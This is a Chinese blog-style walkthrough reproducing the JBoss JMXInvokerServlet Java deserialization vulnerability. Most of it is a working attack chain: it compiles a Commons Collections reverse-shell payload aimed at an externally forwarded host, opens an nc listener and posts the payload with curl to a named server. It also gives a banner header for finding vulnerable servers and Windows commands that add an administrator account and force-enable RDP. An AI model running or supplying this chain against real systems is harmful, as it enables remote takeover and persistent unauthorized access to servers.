Jboos 反序复现

• 前言：
• 漏洞原理

这是经典的JBoss反序列化漏洞，JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象，然后我们利用Apache Commons Collections中的Gadget执行任意代码。

• 漏洞地址：http://w12.mucn.site:8080/invoker/readonly

• 设备：

攻击机kali
漏洞靶机：http://w12.mucn.site:8080（靶机的搭建详情此处不赘述）
端口映射服务

• 复现流程：

首先：本机Kali无法运行javac对jar文件进行编译。
解决：apt install default-jdk

• 对本地端口进行映射，不然无法实现交互式shell（自行购买sunny-ngrok TCP版转发）

git clone https://github.com/joaomatosf/JavaDeserH2HC 克隆漏洞利用项目

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 编译

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 5gzvip.idcfengye.com:10000 (IP:端口)

• 注意：此处为交互式反弹shell地址 不要填自己的内网ip 收不到反弹的（如果是内网环境当我没说）
• IP和端口填映射出去的服务器地址和端口 如：5gzvip.idcfengye.com:10000

• 开启监听：

nc -v -l -p 1616（此处填的是你内网映射出去的端口）

• 运行如下 向服务器发送序列化的后的攻击文件

binary：[ˈbaɪnəri]

curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

• 查看监听内容(可以看见连接信息)：

• 直接输入命令 交互式操作。

• 该漏洞尝试查找：

X-Powered-By: Servlet/3.0; JBossAS-6

• 常用cmd命令：
• 添加用户到管理员组：

net localgroup administrators mucn /add

• cmd强开3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1